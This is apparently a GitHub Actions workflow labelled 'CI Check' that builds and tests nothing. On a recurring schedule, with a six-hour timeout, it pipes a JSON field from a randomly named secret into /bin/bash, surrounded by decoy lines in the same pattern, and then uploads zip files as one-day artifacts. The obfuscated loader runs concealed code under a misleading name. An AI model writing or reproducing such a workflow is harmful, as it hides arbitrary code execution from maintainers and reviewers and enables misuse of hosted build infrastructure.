name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '45 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          lotru757: ${{ secrets.lotru757 }}
        run: |
          printf '%s' "$lotru757" | jq -r .odwhw52687 | /bin/bash
          echo $jglm17 | jq -r .dqsp50 | /bin/bash
          echo $tlvyw8455 | jq -r .kwhc086 | /bin/bash
          echo $tjogy88 | jq -r .u798 | /bin/bash
          echo $tkzsw534 | jq -r .bhg965 | /bin/bash
          printf '%s' "$t59" | jq -r .bh9634 | /bin/bash
          echo $gzuu41 | jq -r .mz26341 | /bin/bash
          echo $y7 | jq -r .zyqpo8213 | /bin/bash
          printf '%s' "$cv26599" | jq -r .hftu0850 | /bin/bash
          printf '%s' "$fzmpe5456" | jq -r .e35183 | /bin/bash
          echo $nec0 | jq -r .a897 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: mpSSPAaS
          path: "*.zip"
          retention-days: 1
